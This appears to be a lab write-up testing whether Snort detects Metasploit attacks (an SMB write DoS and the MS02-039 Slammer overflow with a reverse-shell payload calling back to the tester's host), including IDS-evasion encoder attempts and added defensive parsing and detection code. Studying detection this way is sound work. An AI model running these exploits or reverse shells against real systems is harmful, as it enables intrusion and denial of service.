datalenlow=25535 dataoffset=25535 fillersize=72
datalenlow=15535 dataoffset=25535 fillersize=72
datalenlow=65535 dataoffset=15535 fillersize=72
datalenlow=55535 dataoffset=15535 fillersize=72
datalenlow=45535 dataoffset=15535 fillersize=72
datalenlow=35535 dataoffset=15535 fillersize=72
datalenlow=25535 dataoffset=15535 fillersize=72
datalenlow=15535 dataoffset=15535 fillersize=72
[*] Auxiliary module execution completed
msf auxiliary(ms09_001_write) >

While exploiting this vulnerability I checked Snort. It gave me a lot of output, all similar to the records below:

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:22.055795 145.100.102.131:60094 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:23121 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC09C71C9  Ack: 0xFB04529A  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5387669 6519

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:22.225651 145.100.102.131:57008 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:54200 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC067E8AA  Ack: 0xBE5EFED  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5387711 6521

.........

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:28.856311 145.100.102.131:51774 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:9359 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC65D1B40  Ack: 0x5842F684  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5389369 6587

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:29.006929 145.100.102.131:46062 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:23546 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC6B16A51  Ack: 0x7395A1E4  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5389407 6589

More information about this exploit: http://www.metasploit.com/modules/auxiliary/dos/windows/smb/ms09_001_write
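The alert records above are in Snort's "full" output format, which is easy to parse and to aggregate. The following Python, added here and not part of the original post or of Snort, parses such records from a constructed sample, counts them per signature and source, and flags a signature that repeats from one source within a short window, which is what made the ms09_001 run stand out in the log.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in Snort's "full" alert format: two of the IPC$ records
# quoted above (cut to four lines each) plus a made-up ICMP record.
SAMPLE_ALERTS = """\
[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:22.055795 145.100.102.131:60094 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:23121 IpLen:20 DgmLen:129 DF

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:28.856311 145.100.102.131:51774 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:9359 IpLen:20 DgmLen:129 DF

[**] [1:469:3] ICMP PING NMAP [**]
[Classification: Attempted Information Leak] [Priority: 2]
04/21-15:52:01.348379 145.100.102.131 -> 145.100.105.213
ICMP TTL:44 TOS:0x0 ID:31604 IpLen:20 DgmLen:28
"""

HEADER_RE = re.compile(r"^\[\*\*\] \[(\d+):(\d+):(\d+)\] (.+?) \[\*\*\]$")
PRIORITY_RE = re.compile(r"\[Priority: (\d+)\]")
FLOW_RE = re.compile(r"^(\d\d/\d\d-\d\d:\d\d:\d\d\.\d+) (\S+) -> (\S+)$")


def _endpoint(text):
    """Split 'host:port' into (host, port); ICMP records carry no port."""
    host, sep, port = text.rpartition(":")
    return (host, int(port)) if sep and port.isdigit() else (text, None)


def parse_alerts(text):
    """Parse blank-line separated Snort 'full' alert records into dicts."""
    alerts = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.strip().splitlines()
        head = HEADER_RE.match(lines[0]) if len(lines) >= 4 else None
        prio = PRIORITY_RE.search(lines[1]) if head else None
        flow = FLOW_RE.match(lines[2]) if prio else None
        if not flow:
            continue                              # truncated or garbled record
        src, sport = _endpoint(flow.group(2))
        dst, dport = _endpoint(flow.group(3))
        alerts.append({
            "sid": int(head.group(2)), "msg": head.group(4),
            "priority": int(prio.group(1)),
            # no year in this format: strptime defaults to 1900, fine for ordering
            "time": datetime.strptime(flow.group(1), "%m/%d-%H:%M:%S.%f"),
            "src": src, "sport": sport, "dst": dst, "dport": dport,
            "proto": lines[3].split()[0],
        })
    return alerts


def _key(a):
    return (a["sid"], a["src"], a["dst"], a["dport"])


def count_by_signature(alerts):
    """Alert count per (sid, src, dst, dport): the first view an analyst wants."""
    counts = defaultdict(int)
    for a in alerts:
        counts[_key(a)] += 1
    return dict(counts)


def bursts(alerts, threshold=2, window_s=10.0):
    """Keys with at least `threshold` alerts inside any `window_s` seconds."""
    by_key = defaultdict(list)
    for a in alerts:
        by_key[_key(a)].append(a["time"])
    hits = []
    for key, times in by_key.items():
        times.sort()
        start = 0
        for end in range(len(times)):             # sliding window over times
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                hits.append(key)
                break
    return hits
```

Feeding the real /var/log/snort/alert file to parse_alerts and then to bursts gives a short list of (sid, source, destination, port) tuples to look at instead of hundreds of near-identical records.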

  • Launch a well known UDP based MSSQL attack against your VM.
    • Doesn’t matter whether MSSQL is installed or not.

We tried a few other exploits first, but they did not work out. This is because those attacks were TCP based, while the following one is UDP based:

msf > use windows/mssql/ms02_039_slammer
msf exploit(ms02_039_slammer) > show options

Module options:

   Name        Current Setting                                Required  Description
   ----        ---------------                                --------  -----------
   HEX2BINARY  /opt/metasploit3/msf3/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
   MSSQL_PASS                                                 no        The password for the specified username
   MSSQL_USER  sa                                             no        The username to authenticate as
   RHOST                                                      yes       The target address
   RPORT       1434                                           yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   MSSQL 2000 / MSDE <= SP2

msf exploit(ms02_039_slammer) > set rhost 145.100.105.196
rhost => 145.100.105.196
msf exploit(ms02_039_slammer) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms02_039_slammer) > set lhost 145.100.102.131
lhost => 145.100.102.131
msf exploit(ms02_039_slammer) > show options

Module options:

   Name        Current Setting                                Required  Description
   ----        ---------------                                --------  -----------
   HEX2BINARY  /opt/metasploit3/msf3/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
   MSSQL_PASS                                                 no        The password for the specified username
   MSSQL_USER  sa                                             no        The username to authenticate as
   RHOST       145.100.105.196                                yes       The target address
   RPORT       1434                                           yes       The target port

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     145.100.102.131  yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   MSSQL 2000 / MSDE <= SP2

msf exploit(ms02_039_slammer) > exploit

[*] Started reverse handler on port 4444
[*] Sending UDP packet with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Exploit completed, but no session was created.

This exploit succeeded!

  • Is this action detected by Snort?

No, nothing was detected by Snort.

  • Try different encoders using Metasploit evasion options / msfencode.
    • What is Snort telling you?
msf > use windows/mssql/ms02_039_slammer
msf exploit(ms02_039_slammer) > set rhost 145.100.105.196
rhost => 145.100.105.196
msf exploit(ms02_039_slammer) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms02_039_slammer) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai
msf exploit(ms02_039_slammer) > set EnableContextEncoding 1
EnableContextEncoding => 1
msf exploit(ms02_039_slammer) > set ContectInformationFile application.map
ContectInformationFile => application.map
msf exploit(ms02_039_slammer) > set lhost 145.100.102.131
lhost => 145.100.102.131
msf exploit(ms02_039_slammer) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.

The error means the following: the payloads available are determined by the memory ‘Space’ available for the exploit to use. Note also that the option name typed above, ContectInformationFile, is misspelled: Metasploit's option is ContextInformationFile, so that set command only created an unrelated datastore variable and no context map file was ever handed to the encoder.

msf exploit(ms02_039_slammer) > info

       Name: Microsoft SQL Server Resolution Overflow
    Version: 7724
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Good

Provided by:
  hdm <hdm@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   MSSQL 2000 / MSDE <= SP2

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   no        The password for the specified username
  RHOST     145.100.105.196  yes       The target address
  RPORT     1434             yes       The target port
  USERNAME  sa               no        The username to authenticate as

Payload information:
  Space: 512
  Avoid: 6 characters

Description:
  This is an exploit for the SQL Server 2000 resolution service buffer
  overflow. This overflow is triggered by sending a udp packet to port
  1434 which starts with 0x04 and is followed by long string
  terminating with a colon and a number. This module should work
  against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649
  http://www.osvdb.org/4578
  http://www.securityfocus.com/bid/5310
  http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx

Here, the payload space is ‘Space: 512’. However, the target application does not allow certain characters to be used (usually the null character 0x00, as this denotes the end of a string [character array]). The payload cannot contain six characters: ‘Avoid: 6 characters’. When we run the exploit, the payload generators will attempt to fit our desired payload into a space of 512 bytes that excludes 6 specific characters. This is not always possible, and will result in the error: No encoders encoded the buffer successfully. I tried a few other payloads, but this resulted in nothing.
< Source >
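Snort reported nothing for the ms02_039 run above, yet the module description gives enough to recognise the packet shape: a UDP datagram to port 1434 whose first byte is 0x04 followed by an over-long string. The Python below is an added example, not from the post or from Metasploit, that classifies constructed datagrams by that shape from the defender's side; the length cut-off is an assumption.

```python
# Added example (not from the post or from Metasploit): a minimal detector for
# the packet shape the module description above gives. Thresholds are assumed.
SSRP_PORT = 1434                 # SQL Server Resolution Protocol (UDP)
CLNT_UCAST_INST = 0x04           # "which port does instance <name> listen on?"
# Instance names are short (SQL Server limits them to 16 characters), so an
# instance request carrying hundreds of bytes cannot be legitimate. The
# cut-off below is an assumption chosen well above any real name length.
MAX_SANE_NAME_LEN = 64


def classify_ssrp(dst_port, payload):
    """Classify one UDP datagram as 'ignore', 'benign' or 'suspicious'."""
    if dst_port != SSRP_PORT or not payload:
        return "ignore"                      # not SSRP traffic at all
    if payload[0] != CLNT_UCAST_INST:
        return "benign"                      # other SSRP message types
    name = payload[1:].rstrip(b"\x00")
    if len(name) > MAX_SANE_NAME_LEN:
        return "suspicious"                  # oversized "instance name"
    if any(b < 0x20 or b > 0x7e for b in name):
        return "suspicious"                  # binary where a name belongs
    return "benign"


def scan(datagrams):
    """Return indexes of suspicious datagrams in a list of (dst_port, payload)."""
    return [i for i, (port, data) in enumerate(datagrams)
            if classify_ssrp(port, data) == "suspicious"]


# Constructed datagrams (not captures): a normal instance lookup, a different
# SSRP message type, and an over-long request made only of filler bytes in the
# shape the description gives (0x04, long string, colon, number).
BENIGN_LOOKUP = bytes([CLNT_UCAST_INST]) + b"MSSQLSERVER\x00"
OTHER_TYPE = bytes([0x02])
OVERSIZED = bytes([CLNT_UCAST_INST]) + b"A" * 400 + b":1\x00"
SAMPLE_TRAFFIC = [
    (1434, BENIGN_LOOKUP),
    (1434, OTHER_TYPE),
    (53, b"\x04" + b"A" * 400),              # same bytes, wrong port: ignored
    (1434, OVERSIZED),
]

if __name__ == "__main__":
    for i in scan(SAMPLE_TRAFFIC):
        print("suspicious SSRP request at index", i,
              "payload length", len(SAMPLE_TRAFFIC[i][1]))
```

The same two conditions (first byte 0x04 on UDP/1434 plus an unusually large datagram) are what a Snort rule for this traffic would key on, which is why a missing rule, not an undetectable packet, explains the silence above.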
